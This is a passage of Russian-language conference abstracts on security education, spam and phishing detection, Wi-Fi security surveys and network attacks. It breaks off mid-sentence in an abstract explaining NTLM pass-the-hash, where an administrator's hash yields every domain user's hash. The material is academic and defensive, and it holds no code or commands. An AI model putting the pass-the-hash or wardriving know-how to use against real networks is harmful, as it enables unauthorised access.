[email protected] Все специалисты по защите информации обязательно должны постоянно повышать свою квалификацию и приобретать новые знания. Возникает вопрос о том, каким образом можно наиболее эффективно организовать процесс обучения. С экономической точки зрения наиболее эффективным методом обучения являются системы дистанционного обучения, т.к. они позволяют получать новые знания без отрыва от производства. Целью данной исследовательской работы являлось изучение систем дистанционного обучения, их достоинств, недостатков, способов построения и обеспечения их информационной безопасности. Системы дистанционного обучения, кроме экономической эффективности, обладают также и другими достоинствами. Они позволяют значительно расширить зону распространения обучающего курса, гарантируют индивидуальный подход к каждому студенту, и по окончании обучения все материалы курса остаются у студента. Основным недостатком подобных систем являются трудности при организации практических занятий. Также нет прямого контакта между преподавателем и студентом, а от студента требуется жесткая дисциплина. Система дистанционного обучения строится на основе технологии «клиент-сервер». В качестве каналов связи используются каналы, предоставляемые сетью Интернет. Поскольку система дистанционного обучения должна содержать личные сведения о пользователях системы, а также внутреннюю информацию, к которой предъявляются особые требования по информационной безопасности, необходимо обеспечение информационной безопасности СДО, по крайней мере, класса В3. Необходимо разделение всех пользователей системы на группы, и присвоение каждой группе своих прав на доступ к информации. Рынок СДО в России начал развиваться с 2000 года. Однако на сегодняшний день абсолютное большинство продуктов, представленных на нем, иностранного производства. Подобные системы отличаются широкими функциональными возможностями, но они слишком дорогостоящие, порою возникают проблемы с их русификацией и модификацией под требования конкретного заказчика. Актуальным решением является использование системы с открытым кодом Moodle. СДО Moodle широко известна в мире, ее используют более чем в 100 странах, и российским компаниям имеет смысл обратить на нее свое внимание.
IT security conference for the next generation
61
Разработка веб-приложения для изучения и исследования методов защиты информации от несанкционированного воздействия Азизян Н.А. Соавтор: Арутюнян Р.С. Государственный Инженерный Университет Армении (Политехник) Ереван, Армения
[email protected] Данное Приложение является эффективным средством для изучения и исследования методов защиты информации от несанкционированного воздействия, благодаря достаточно богатому списку содержащихся в нем криптографических и стеганорафических алгоритмов и других инструментов, так или иначе имеющих отношение к реализации защиты информации. Оно может использоваться для проведения лабораторных работ, а также как демонстрационный материал для проведения лекций и семинаров. Приложение с легкостью может быть интегрировано во всевозможные реализации дистанционного обучения, а простота использования и богатый арсенал вспомогательных материалов делают его доступным даже для неискушенных пользователей. Наша жизнь есть не что иное, как непрерывный процесс обмена информацией. Постоянно растущий объем передаваемой и получаемой информации определяет непрерывное развитие технологий ее обработки и усиливает информационное давление, как на отдельного человека, так и на общество в целом. При этом безопасность в самом широком смысле во многом определяется защищенностью информационных процессов. В связи с этим все значимей становятся проблемы обеспечения информационной безопасности и, в частности, защиты информации. Этим определяются наметившиеся тенденции включения в состав направлений, по которым готовятся специалисты в большинстве технических вузов, специальностей, связанных с защитой информации. Именно наличие высококвалифицированных специалистов в области защиты информации может решить проблемы информационной безопасности. Для решения данного вопроса на надлежащем уровне необходимы грамотные разработки всевозможных учебных программ и курсов, целью которых будет являться обучение и подготовка специалистов в области защиты информации. Непосредственно информация от целенаправленного воздействия может быть защищена двумя основными группами методов: криптографическими и стеганографическими, которые представляют большой интерес для изучения и проведения различных исследований. Немалый интерес также представляет изучение методов криптоанализа и стегоанализа, которые могут оказаться полезными при создании и совершенствовании средств защиты информации. Криптография - наука о методах обеспечения конфиденциальности (невозможности прочтения информации посторонними) и аутентичности (целостности и подлинности авторства, а также невозможности отказа от авторства) информации. На сегодняшний день криптографические методы, наряду с традиционным обеспечением информации, применяются для идентификации и аутентификации пользователей, защиты каналов передачи данных от навязывания ложных данных, защиты электронных документов от копирования и подделки. Криптоанализ - это наука о методах получения исходного значения зашифрованной информации, не имея доступа к секретной информации (ключу), необходимой для этого. В большинстве случаев под этим подразумевается нахождение ключа. Действительно криптостойкую систему можно создать только в случае наличия обширных знаний и опыта в области криптоанализа. Современная стеганография позволяет скрывать одно сообщение внутри другого и выглядеть как совершенно нормальный графический, музыкальный или какой-нибудь другой файл. Современные стеганографические методы условно можно поделить на низкотехнологичные и высокотехнологичные. Низкотехнологичные методы на первый взгляд довольно примитивны, однако в некоторых случаях они могут оказаться довольно полезными именно потому, что не требуют никакого дополнительного ПО, а просто используют стандартные возможности таких программ как MSWord, MSPowerPoint (например, закрыть какой-нибудь картинкой тайный текст), различные методы командной строки операционной системы и т. д. Высокотехнологичные методы требуют более глубоких познаний в данной области, а также соответствующее ПО, которое позволит производить всевозможные стеганографические действия. Практически, цифровая стеганография,
IT security conference for the next generation
62
это некие действия, которые совершаются для сокрытия сообщения в контейнере и, в зависимости от метода их совершения, они подразделяются на три основные группы: замещение; добавление; генерация. Стегоанализ - это наука о выявлении факта передачи скрытой информации в анализируемом сообщении. В некоторых случаях под стегоанализом понимают также извлечение скрытой информации из содержащего еѐ сообщения и (если это необходимо) дальнейшую еѐ дешифровку. На сегодняшний день существует два направления в философии стегоаналитических действий: универсальные; специализированные. Универсальные методы, в свою очередь, подразделяются на: самообучающиеся; слепая идентификация; статистически–параметрическое моделирование. Данная работа посвящена изучению существующих методов защиты информации от целенаправленного воздействия и создания на этой основе веб-приложения, которое позволит наиболее полно изучать и исследовать современные криптографические и стеганографические подходы. Веб-приложение предназначено не только для проведения лекций и практичеких занятий по предметам, в рамках которых производится изучение криптографии/криптоанализа и стеганографии/стегоанализа, но и для реализации различных исследований, благодаря наличию в нем инструментов криптоанализа и стегоанализа. Это позволит исследователям с легкостью проводить сравнения крипто и стеганостойкости тех или иных алгоритмов, не тратя время на черновую работу. Для этого приложение содержит достаточно большое количество как криптографических, так и стеганографических алгоритмов. Интерфейс приложения достаточно удобен и доступен, поэтому оно может быть использовано простыми любознательными пользователями без какой-либо специальной подготовки. Важнейшую составную часть приложения в образовательном плане составляет справочная подсистема, которая содержит подробные сведения не только по организации и функционированию приложения, но и по всем алгоритмам и способам, включенным в него. Более того, приложение реализовано таким образом, что оно с легкостью может быть интегрировано во все возможные реализации процесса он-лайн обучения, таких, как веблаборатории, он-лайн семинары и т. д. В заключение можно отметить, что данное Веб-приложение является эффективным средством изучения и исследования методов защиты информации от несанкционированного воздействия для студентов, исследователей и всех заинтересованных лиц. Использованные при разработке данного приложения программы и технологии делают его мультиплатформенным и многоязычным. Более того, модульность дает возможность адекватного интегрирования приложения в те или иные системы интерактивного обучения. В работе более детально представлены теоретические сведения о криптографических и стеганографических методах защиты информации, а также содержится подробное описание приложения, в том числе и пути его дальнейшего развития и усовершенствования.
IT security conference for the next generation
63
Защита компьютера без использования резидентного антивирусного программного обеспечения Чижевский С.В. ГОУ ВПО «Магнитогорский государственный университет» Магнитогорск, Россия
[email protected] Мы живѐм в веке информационных технологий, где защита информации является актуальной проблемой. Существует множество программных продуктов, которые обеспечивают защиту в реальном времени от различных угроз. Как правило, такие продукты стоят дорого, используют значительное количество системных ресурсов компьютера (замедляют его работу), и они защищают только от тех угроз, которые они смогли распознать. Одно из альтернативных средств защиты от вирусов, это сам человек, который понимает, как работают вирусы и, исходя из этого, соблюдает элементарные правила, не допускающие проникновение вирусов. Цель данного проекта – разработать учебный проект для учеников старших классов, студентов, преподавателей и обычных пользователей ПК (владеющих навыками работы за компьютером на среднем уровне), включающий в себя теоретические и практические материалы по проблеме защиты ПК от актуальных угроз безопасности. Некоторые технические моменты будут представлены в виде наглядного видео. Для просмотра видео необходимо наличие интернет браузера, и установленного Adobe Flash версии 6.0 и выше (данный компонент можно скачать по следующей ссылке: http://get.adobe.com/flashplayer/). Объект исследования – защита персонального компьютера. Предмет исследования – основные способы защиты от актуальных на сегодняшний день угроз безопасности. Задачи проекта: Защитить ПК от заражения с внешних носителей. Помочь пользователю в настройке компьютера для безопасной работы в интернете. Помочь пользователю в восстановлении компьютера после блокирования вредоносными программами-вымогателями.
IT security conference for the next generation
64
Инициативная деятельность магистров и аспирантов кафедры МОВС в учебном процессе на мех-мате ПГУ Городилов А.Ю. Соавторы: Дураков А.В., Рой К.С., Юрков К.А. Пермский государственный университет Пермь, Россия
[email protected] Группа магистров и аспирантов кафедры МОВС ПГУ по собственной инициативе подготовила учебные материалы и провела во время летних каникул школу-семинар для студентов младших курсов, обучающихся на механико-математическом факультете. Образовательная деятельность этой группы продолжается и в настоящее время: студентам 4го курса специальности 075200 «Компьютерная безопасность» в рамках учебного процесса читается специально разработанный курс, осуществляется руководство написанием курсовых работ. В июле-августе 2009 года аспиранты 1-го года обучения Юрков К.А., Дураков А.В. и старший преподаватель Катаева С.В. кафедры МОВС ПГУ (Математическое обеспечение вычислительных систем, Пермский государственный университет) организовали и провели на общественных началах занятия со студентами механико-математического факультета 1-2 курса (специальности «Прикладная математика и информатика» и «Информационные технологии») в рамках школы-семинара «Актуальные вопросы разработки современного программного обеспечения» на базе «Лаборатории инструментальных средств разработки программного обеспечения» кафедры МОВС. Занятия школы посещал 21 студент. Актуальность проведения школы с такой тематикой обусловлена тем, что подготовленный в рамках государственного образовательного стандарта программист, придя по окончании вуза на производство, зачастую вынужден тратить большое количество времени на «дообучение». Причин тому может быть несколько: незнание современных технологий разработки программных продуктов, отсутствие навыков разработки больших промышленных приложений, неумение работать в команде. Для повышения конкурентоспособности студентов, обучающихся на механико-математическом факультете ПГУ, отдельное направление летней школы-семинара было посвящено актуальным проблемам разработки программного обеспечения. Занятия проходили в трех секциях. Секция: Технологии промышленной разработки ПО (Юрков К.А.) Темы занятий в рамках этой секции: Особенности разработки современных промышленных приложений на платформе .NET; Управление проектами по разработке программного обеспечения; Искусственный интеллект в современных программных системах. Первая тема касалась вопросов написания программного кода на платформе .NET. Основной акцент был сделан на особенности разработки промышленных приложений, связанные с необходимостью создания надежного, безопасного, легко настраиваемого, быстродействующего приложения. Вторая тема была посвящена особенностям управления коллективом разработчиков программных продуктов, специальным приемам коллективной разработки программного кода. Были рассмотрены основные технологии программирования, а также современные подходы к автоматизации тестирования, контроль версий и т.д. В рамках третьей темы студенты знакомились с основами искусственного интеллекта. Однако упор делался не столько на академические знания, сколько на общее понимания роли методов искусственного интеллекта в современных программных системах. В частности, были рассмотрены возможности применения онтологического моделирования для создания адаптивных и адаптирующихся систем, применения генетических алгоритмов для решения «вычислительно сложных» задач, решения задач кластеризации и распознавания с помощью искусственных нейронных сетей.
IT security conference for the next generation
65
Данное направление школы семинара дало ощутимые результаты: навыки и умения, полученные студентами, активно используются в рамках учебного процесса. Также есть все основания полагать, что полученные в школе-семинаре знания будут крайне востребованы на производстве. Учитывая положительные отзывы студентов и преподавателей, проводивших занятия, в дальнейшем планируется продолжить практику обучения студентов по данному направлению. Секция: Технологии распределенных вычислительных систем (Дураков А.В.) В рамках данной секции были рассмотрены следующие темы: Обзор современных методов распределенных вычислений; CUDA. Неграфические вычисления на видеокартах; MPI; Основы кластерной архитектуры. Были проведены теоретические и практические занятия. В результате студенты познакомились с современными архитектурами высокопроизводительных систем, технологиями и методами параллельного программирования, получили базовые навыки строительства кластеров на основе Windows Server 2008 HPC Edition (кластер из 8 машин), а также на основе Linux Ubuntu (кластер из 2 машин). Секция: Основы организации эффективного рабочего процесса (Катаева С.В.) На занятиях были рассмотрены следующие темы: Тайм-менеджмент; Целеполагание; Управление проектами. Кроме того, аспирант 2-го года обучения Городилов А.Ю. разработал учебный курс «Сложность и надежность алгоритмов», входящий в компоненту дисциплин по выбору, для студентов 4-го курса специальности 075200 «Компьютерная безопасность». Как известно, для обеспечения защищенного обмена секретной или конфиденциальной информацией широко используются криптографические протоколы с открытым ключом. В основе таких протоколов лежат сложные математические задачи, принадлежащие классу NP-трудных задач. Это означает, что нахождение решения задачи без знания дополнительной информации (закрытого ключа) должно занимать неприемлемо много времени. На аналогичных принципах основаны и протоколы электронной цифровой подписи. Таким образом, для разработки новых и исследования существующих надежных криптографических протоколов чрезвычайно важно уметь оценивать временную сложность алгоритмов и класс сложности задач. В рамках разработанного Городиловым А.Ю. курса студенты знакомятся с основными способами оценки сложности алгоритмов, важнейшими классами сложности задач, эффективными приближенными алгоритмами решения трудных задач; учатся строить точные и асимптотические оценки, определять класс сложности задачи, выявлять алгоритмически неразрешимые задачи; получают навыки сравнения реальных программ на предмет сложности и надежности. Надежность криптографического способа защиты определяется стойкостью используемой схемы шифрования к криптоанализу. Задача криптоанализа состоит в нахождении секретного ключа среди множества всех возможных ключей, то есть является задачей поиска. Таким образом, одним из возможных способов проведения криптоанализа является использование эвристических алгоритмов, например, генетических алгоритмов, приближенно решающих задачу поиска за ограниченное время. Тема «Генетические алгоритмы» также рассматривается в упомянутом курсе. Кроме того, разработка генетических алгоритмов для решения различных прикладных задач входит в темы курсовых работ студентов нашей кафедры. В том числе, в настоящее время тема курсовой работы одного из студентов третьего курса связана с построением генетического алгоритма для криптоанализа некоторой модификации подстановочного шифра. В перспективе планируется продолжать предлагать студентам в качестве тем курсовых работ задачи, связанные с защитой информации, а также с генетическими алгоритмами. В плане дальнейшего развития учебного курса «Сложность и надежность алгоритмов» имеется возможность организовать дополнительные факультативные занятия. На таких занятиях можно рассматривать алгоритмы, лежащие в основе реальных используемых схем шифрования, оценивать их сложность и обосновывать надежность в смысле устойчивости к различным атакам. Кроме того, новой и перспективной областью исследований являются квантовые вычисления и
IT security conference for the next generation
66
квантовая криптография. Рассмотрение квантовых алгоритмов как нового вида алгоритмов представляется оригинальной темой в образовательном процессе. Работу Роя К.С. (магистра 2-го года обучения) в рамках образовательной деятельности можно охарактеризовать следующим образом: Были организованы дополнительные занятия со студентами, на которых они, в частности, ознакомились с работой Роя К.С. «Защита интерпретируемого кода программных продуктов: методы обфускации и деобфускации. Деобфускация кода, написанного на JavaScript»; Осуществляется руководство при написании курсовых работ по темам, размещенным на сайте Академии Касперского, а именно: «Поиск скрытых каналов», «Моделирование вирусных эпидемий» и «Поиск тематических веб-страниц»; В дальнейшем планируется проведение семинара с участием представителей Лаборатории Касперского; организация дополнительных занятий со студентами; подготовка студентов к участию в различных научных конференциях.
Обучение компьютерной безопасности при помощи видеоуроков Адамов А.С. Харьковский Национальный университет радиоэлектроники Харьков, Украина
[email protected] Данная статья описывает новый способ обучения пользователей в области компьютерной безопасности с помощью видеоуроков, которые становятся все более и более популярными в последнее время. Иногда сложно для обычного пользователя найти информацию о методах защиты от современных киберугроз. И даже в случае, если таковая была найдена, не все формы ее представления легки для понимания. Таким образом, пользователи становятся жертвами мошеннических действий хакеров и теряют свои конфиденциальные данные. Целью работы является показать, вероятно, наиболее эффективный способ обучения - с помощью видеоуроков. Так как визуальную информацию достаточно просто воспринимать, особенно с использованием скринкастов (запись действий на экране) для удаления вредоносных программ и настройки безопасности системы. Особенно, если речь идет об инструкциях по удалению вредоносной программы – гораздо проще посмотреть видео вместо того, чтобы копаться в текстовом описании угрозы. Ключевые слова: видео, обучение, руководство, скринкаст, уроки, youtube.
IT security conference for the next generation
67
6
Секция
Спам. Методы обнаружения спама анализом содержимого и без него. Фишинг
с
Алгоритмы выявления спама со словарем Ковалев Д.С. Соавтор: Кренделев С.Ф. Новосибирский государственный университет Новосибирск, Россия
[email protected] В работе описывается семейство универсальных алгоритмов классификации текстов. В частности, описанные алгоритмы могут быть применены для обнаружения спама. Задача классификации текстов известна давно, но до сих пор не утратила актуальность. Она состоит в том, чтобы понять к какой категории относится текст, причем набор возможных категорий известен заранее. Область применения решения этой задачи достаточно широка и, в частности, включает в себя обнаружение спама. В этом случае есть только две категории текстов: спам и не спам, и нужно определить категорию для нового электронного письма. Предположим, что некоторый человек получил статью, которую надо классифицировать по содержанию. Заранее известно, что это статья либо по электротехнике, либо по общей физике. Человек не имеет никакого представления об этих областях, но классифицировать как-то нужно. Он может поступить следующим образом: взять словарь по электротехнике и словарь по общей физике и посмотреть, в каком из словарей незнакомые слова из статьи встречаются чаще. Тот словарь, который даст наибольшее совпадение по незнакомым словам, и определит принадлежность. В данной работе вводится формальное определение словаря для строки как мультимножества всех возможных ее подстрок фиксированной длины. Длина подстрок определяет порядок словаря. Из заданного словаря всегда можно построить словарь меньшего порядка. Словари одного порядка для разных строк могут объединяться. Если говорить об анализе спама, то строятся два словаря – для обычных писем и спама. Каждое письмо можно считать строкой. Для нее строится словарь и объединяется с имеющимся из нужной категории. Далее приводится три способа определения расстояния от заданного словаря до произвольной строки. Чем меньше расстояние от словаря от строки, тем ближе содержание строки соответствует словарю. Категория строки определяется в соответствии со словарем, к которому она ближе всего. Если обратиться к аналогии из сжатия данных, то расстояние от строки до словаря можно трактовать как коэффициент сжатия, полученный при сжатии строки с помощью этого словаря. Чем больше коэффициент сжатия, тем меньше расстояние до словаря. Все три способа определения расстояния от строки до словаря начинаются с того, что для строки тоже строится словарь. Фактически, далее идет определение расстояния между словарями. Первые два описанных способа являются достаточно простыми в реализации, позволяют быстро проводить вычисления, но точность распознавания можно улучшить. Первое улучшение заключается в том, чтобы использовать несколько словарей разных порядков, каждый из которых имеет свой вес. Итоговое расстояние вычисляется как взвешенное. Следующее улучшение вынесено как третий вариант алгоритма. Суть его состоит в том, чтобы оценить вероятность появления каждого символа в строке, используя заданный словарь. Логарифм от произведения вероятностей для каждого символа и определит расстояние до словаря. В последней части статьи приводится способ того, как полученные алгоритмы можно использовать для определения похожести строк. Это может использоваться для проведения «поиска с опечатками», когда по неверно написанному слову находится нужное. Также приводятся результаты использования полученных алгоритмов на практике для обнаружения спама и ряд замечаний по поводу выбора их параметров. IT security conference for the next generation
68
Программная реализация модуля по борьбе с фишингом Василега И.А. Соавтор: Люлько И.В. Сумской государственный университет Сумы, Украина
[email protected] Аннотация: В данной работе предложена технология решения усовершенствованного способа обнаружения фишинга с обратной связью, в результате применения которой пользователь может оперативно проверить наличие подозрительных ссылок. Следовательно, ограничивается доступ к потенциально опасному контенту. Результатом работы является программа, предназначенная для решения данной проблемы. Как среда разработки для написания программы использован Microsoft Visual C# 2008 Express Edition. В настоящее время одним из направлений борьбы с фишингом является создание списка фишинговых сайтов и последующая сверка с этим списком. Подобная система существует в браузерах Internet Explorer, Mozilla Firefox, Google Chrome, Safari и Opera. Firefox использует антифишинговую систему Google. Opera использует «чѐрные списки» PhishTank и GeoTrust и списки исключений GeoTrust. Недостатком подобных систем является отсутствие обратной связи со стороны пользователя. Актуальность предлагаемой работы обосновывается распространением фишинга и необходимостью борьбы с ним различными способами. Целью предлагаемой работы является разработка технологии, которая предусматривает возможность взаимодействия с антифишинговым модулем. При этом не используются списки исключений, а создается список разрешенных сайтов и потенциально проблемная ссылка сверяется с указанным списком разрешенных сайтов. Предлагаемый продукт используется следующим образом: программа запускается одновременно с браузером; в базу данных программы пользователь добавляет те ссылки, которыми он пользуется и наверняка знает, что они не содержат фишинга; когда, например, к пользователю приходит письмо с просьбой зарегистрироваться и ввести свои данные на каком-то сайте, то пользователь, имея базу данных проверенных ссылок, оперативно проверяет наличие в ней подозрительной ссылки. В случае, когда ссылка имеется, программа сообщает об этом, а при отсутствии ссылки программа выдает сообщение, что такой ссылки не найдено и возможно она является фишинг-ссылкой; при сообщении программы о потенциальной опасности ссылки пользователь принимает решение об использовании данного ресурса. Программное обеспечение позволяет пользователю в стандартный модуль проверки фишинга добавлять надежные URL-адреса в ручном режиме, что дает возможность уменьшить временной интервал от появления опасности до ее обнаружения. В результате применения предлагаемой программы пользователь получает возможность более эфективно противостоять проблеме фишинга.
IT security conference for the next generation
69
Спам и фишинг. Методы обнаружения и борьбы Файзуллин Р.В. Башкирский Государственный Аграрный Университет Уфа, Россия
[email protected] Непрошеная корреспонденция рекламного характера все больше и больше мешает работе пользователям сети Интернет. Спам-рассылки не только загромождают электронные ящики, но и несут в себе зачастую не нужную, а то и зловредную информацию. Методы обнаружения спама и методы борьбы с фишингом являются актуальной темой современности. Определение спама часто и эффективно используется на практике. Спам-рассылки чаще всего носят рекламный или коммерческий характер, что является важным моментом в исследовании спама. К наиболее распространенным видам спама относятся: реклама, реклама незаконной продукции, антиреклама, нигерийские письма, фишинг. Пользователи Интернета как правило негативно реагируют на спам, хотя он и является одним из эффективных способов Интернет рекламы. Большинство пользователей относится к спаму как к нежелательной почте. По мнению большинства компаний, занимавшихся исследованиями в области спама, можно сделать вывод, что большинство пользователей Интернета получают достаточно большое количество сообщений рекламного характера и поэтому в связи с распространенностью спама вынуждены различать «хорошую» и «плохую» почту. Значительные масштабы реализации спама заставляют все большее количество пользователей прибегать к помощи специальных программ для фильтрации электронной почты. Но, к сожаленю, большинство таких программ имеют несовершенные алгоритмы фильтрации, поэтому подвергают удалению части сообщений содержащих информацию, необходимую пользователю. Таким образом, благодаря спаму в Интернете сложилась ситуация по угрозе общения и соблюдения принципов электронной коммуникации. Один из важных способов общения – электронная почта, имеющий максимальное удобство и простоту, подвергается опасности со стороны спамеров. Анализ имеющейся литературы данной тематики позволяет выделить основные черты спама: анонимный отправитель (указан вымышленный или сгенерированный автоматически адрес); односторонний характер коммуникации, выражающийся в пренебрежении интересами получателя; императивный характер значительного числа сообщений (побуждение к приобретению товаров, услуг, посещению веб-страниц и т.д.); намеренное нарушение орфографии, которое не препятствует адекватному восприятию сообщения, но требует дополнительных усилий со стороны получателя (используется с целью преодолеть программные фильтры). Спам обладает высокой степенью динамизма. Использование различных средств для привлечения все новых и новых средств для привлечения участников Интернет-общения заставляет спам развиваться вместе с коммуникативными представлениями пользователей Интернета, ориентируясь на их опыт и предпочтения. Анализ спама приобретает практическую ценность. Это вызвано, прежде всего, тем, что данные о структуре и содержании текстов, как и коммуникативные особенности отправителей и получателей сообщений, прежде всего, необходимы для разработки программного обеспечения средств фильтрации. В данной работе рассматриваются характеристики наиболее быстрых методов доступа к спам-рассылкам: сбор спама с помощью адресов-«ловушек; голосование пользователей; анализ всей проходящей через почтовую систему почты. Современные антиспамовые системы, установленные на крупных почтовых серверах, используют широкие возможности по определению признаков спама и разнообразные технологии по IT security conference for the next generation
70
их выявлению. Однако одним из главных вопросов данных разработок является вопрос автоматизации механизмов фильтрации. Небольшое количество таких механизмов уже используется в Яндексе. Кроме того, некоторые из них там же проходят тестирование. Опубликованные результаты проведения экспериментов по использованию таких механизмов позволяют сделать следующие выводы: Автоматические механизмы в крупных антиспамовых системах имеют право на существование; Использование таких механизмов является достаточно эфффективным в сочетаниях с другими факторами; Антиспамовые системы демонстрируют относительно стабильную эффективность; Антиспамовые системы требуют постоянного «ухода» и присмотра; Существует возможность (хотя и недешевая) достаточно точного внешнего мониторинга их эффективности, хорошо согласующегося с эффективностью реально использующихся в них алгоритмов и техник; Современные методы системного анализа используют направления создания новых методов анализа и модернизации уже построенных механизмов; Изучение методов борьбы со спамом будет актуальным и в последующие годы, так как пока существует спам, существует необходимость борьбы с ним.
IT security conference for the next generation
71
7
Секция
Сетевая безопасность Компьютерный вирус как инструмент анализа и модернизации современных средств защиты Ткачев Д. Соавторы: Сидоров М.В., Старцев С.С. Новосибирский Государственный АрхитектурноСтроительный Университет (Сибстрин) Новосибирск, Россия
[email protected] Аннотация: В данной статье описывается проблема безопасности сети, построенной с использованием устройств для беспроводной передачи данных, кратко описываются преимущества и недостатки этой технологии с точки зрения обеспечения надлежащего уровня безопасности сети. Представлен метод оценки уровня безопасности Wi-Fi точек доступа в автоматическом режиме, и дан краткий обзор собранной статистической информации. Уровню обеспечения безопасности беспроводных устройств уделяется в настоящее время крайне малое внимание. Но этот показатель в свою очередь является очень важной характеристикой общего уровня информационной безопасности сетей. Многие из существующих алгоритмов шифрования и аутентификации имеют уязвимости, позволяющие подключиться к беспроводному устройству не авторизованному пользователю, либо же получить полный контроль над данным устройством. Анализ уровня защищенности беспроводных сетей может производиться двумя способами: внутренним и внешним. Внутренний анализ подразумевает знание топологии сети, используемого оборудования, методов шифрования и аутентификации. В данной работе рассматривается анализ уровня защиты без априорного знания свойств сети, то есть внешним методом. Реализована методика и работающий прототип системы, производящей сбор статистической информации в максимально автоматизированном режиме. Созданные и представленные скрипты и программное обеспечение в автоматическом режиме выполняют анализ точек доступа (Access Point) и оценивают качество защищенности с помощью новой методики на основе экспертной оценки. Оценка уровня безопасности беспроводных сетей производится с приведением итоговых баллов к 100-балльной системе. Большее количество набранных баллов соответствует большей надежности беспроводное взаимодействие устройств внутри данной сети. Первая версия ПО была, написанная на C++ и Qt4 умела производить поиск беспроводных устройств, производить расчет баллов уровня защищенности. Но для полноценной массовой и автоматизированной обработки, полученных данных, этого оказалось недостаточно. Было необходимо собрать большое количество информация о параметрах точек доступа, которая нужна для статистической представительной обработки и общего отражения состояний безопасности беспроводных устройств города Новосибирска, а также о распространенности использования сетевых устройств в разных районах города. При проведении тестирования написанного программного обеспечения было произведено агрегирование информации о 2117 точках доступа. Информация о количестве точек доступа, обнаруженных при сканировании. Сканирование производилось во время движения на автомобиле,
IT security conference for the next generation
72
при помощи стандартных Wi-Fi карточек, встроенных в ноутбук, без использования дополнительных антенн или других устройств для лучшего приема/передачи сигнала. Приведенные в конце статьи рекомендации позволяют настроить беспроводное устройство на базе технологии Wi-Fi для обеспечения достаточного уровня безопасности. Данные рекомендации доступны для пользователей, не обладающих глубокими знаниями в области администрирования сетей.
Обеспечение безопасности сетевой инфраструктуры предприятия. Петлевые атаки Баринов А.Е. Южно-уральский государственный университет Челябинск, Россия
[email protected] Сетевая инфраструктура — основа единой информационной среды современной компании. Правильно организованная сетевая инфраструктура компании позволяет сотрудникам хранить и обрабатывать информацию, оперативно обмениваться данными друг с другом и внешними контрагентами, организовать эффективную работу бизнес-приложений, надежный и безопасный доступ к внешним источникам данных. Современная сетевая инфраструктура предприятия представляет собой совокупность программного обеспечения, оборудования, хранилищ данных и каналов связи. Создание современной сетевой инфраструктуры предприятия предполагает под собой следующие этапы: анализ потребностей и возможностей предприятия, выбор средств реализации, установка и настройка. Разнообразие оборудования, программного обеспечения и конфигурации создают множество угроз информационной безопасности. Поэтому на этапе проектирования сетевой инфраструктуры нельзя забывать про обеспечение информационной безопасности. Обеспечение информационной безопасности сетевой инфраструктуры предприятия заключается в безопасном конфигурировании внешних сетевых сервисов, внутренних сетевых сервисов, установке специализированного ПО и оборудования для обеспечения информационной безопасности, а также принятия специальных организационных мер. Информационная безопасность предприятия является состоянием адекватной защищенности информационной системы предприятия, при котором она в состоянии противодействовать внешним и внутренним угрозам, и при этом не создавать угроз прочим информационным системам. Поэтому важно оказывать противодействие не только тем атакам, объектом которых является информационная система предприятия, но и тем атакам, путь которых проходит через информационную систему предприятия. В работе рассмотрены общие основы проектирования сетевой инфраструктуры предприятия с учѐтом обеспечения информационной безопасности, внешние атаки информационных систем предприятия, а также петлевые атаки. При рассмотрении общих основ проектирования сетевой инфраструктуры предприятия с учѐтом обеспечения информационной безопасности был проведѐн анализ подобных сетей на примере сети малого предприятия. В результате чего были вынесены общие рекомендации по безопасному построению сетевой инфраструктуры предприятия и настройке серверов. При анализе внешних атак были рассмотрены следующие типы атак: удаленное администрирование, кража данных, загрузка вредоносного ПО (сетевых червей, классических компьютерных вирусов, троянских программ), удалѐнные сетевые атаки (подмена доверенного объекта или субъекта вычислительной сети, ложный объект вычислительной сети, отказ в обслуживании). По каждому из типов угроз проведен анализ существующих методов обнаружения и предотвращения. В результате были вынесены собственные авторские рекомендации. В работе было введено определение петлевой атаки. Петлевая атака - такая атака, что объект и субъект атаки находятся в одном положении относительно корпоративной сети, а путь атаки проходит также и через территорию, находящуюся в другом положении относительно, корпоративной сети. При их анализе были рассмотрены, такие атаки, как атаки внутренней петли (субъект и объект атаки находятся вне корпоративной сети), атаки внешний петли (субъект и объект атаки находятся внутри корпоративной сети), петлевые атаки в p2p сетях. Итогом анализа стало вынесение рекомендаций по противодействию данным угрозам в корпоративных сетях. Типичным примером подобной атаки является заражение веб-сайта. По статистике актуальность данной угрозы с каждым
IT security conference for the next generation
73
годом возрастает. В рамках данной работы было предложено использование средства автоматического анализа содержимого веб-сайта с целью выявления подозрительных ссылок. Итогом данной работы стало вынесение 16 общих рекомендаций по защите корпоративных сетей от петлевых атак. Результаты данной работы могут быть применены при построении, обслуживании, модификации, а также аудите информационной безопасности корпоративной сети.
Исследование уязвимости сетей под управлением MS Windows Server 2003/2008 R2 к NTLM-инъекции Телипский Д.А. Национальный горный университет Днепропетровск, Украина
[email protected] В средине 90-х перед разработчиками компании Microsoft был разработан протокол NTLM и NTLMSSP (NTLM Security Service Provider) – подсистема, позволяющая любому клиент-серверному приложению использовать NTLM ничего не зная о его внутренней структуре. Нельзя сказать, что по тем временам это был слабый протокол. Но теперь можно с уверенностью утверждать, что именно с ним связанно большое количество проблем связанных с безопасностью Windows-сетей, поэтому операционные системы семейства Windows, начиная с Windows 2000, используют новый более сильный протокол аутентификации Kerberos. Сейчас можно встретить много утверждений, что протокол аутентификации Kerberos, используемый в сетях Windows 2000, Windows 2003 и Windows 2008 полностью снимает проблему NTLM. Но это не так хотя бы потому, что поддержка NTLM в существующих сетях Windows является обязательной и любая из сторон, принимающих участие в процессе аутентификации, может инициировать использование этого протокола. Именно по этим причинам проблемы безопасности связанные с использованием NTLMаутентификации остаются актуальными и сегодня. На сегодня существует две основных версии NTLM. Кроме того, существует несколько основанных на NTLM протоколов, например протокол аутентификации MS-CHAPv2 (MS-CHAP является NTLM v1 в чистом виде). Рассмотрим более подробно NTLM-хеши. В семействе протоколов NTLM могут использоваться 2 типа хешей: LM-хеш, унаследованный от предыдущих реализаций LanManager и NT-хеш, созданный для протокола NTLM. Соответственно, при входе пользователя в систему, как правило, от пароля берутся и хранятся оба этих хеша. Первая версия протокола NTLM для совместимости поддерживала оба ключа (NT или LM ключем обычно называют соответствующий хеш пароля). В более поздних реализациях используется только NT ключ, однако по умолчанию LM-хеш все равно создается при входе и помещается в хранилище LSA. Теперь, после описания протокола NTLM, проверим возможность компрометации всей корпоративной сети под управлением Windows Server 2003 R2, используя известные недостатки протокола NTLM. Хочу обратить внимание на то, что для того, чтобы подключаться к серверу, вовсе необязательно знать пароль, достаточно лишь обладать NT- или LM-хешем учетной записи. Следовательно, обладая хешем пароля администратора домена, можно спокойно получить хеши паролей всех пользователей домена, после чего проникновение в любую другую 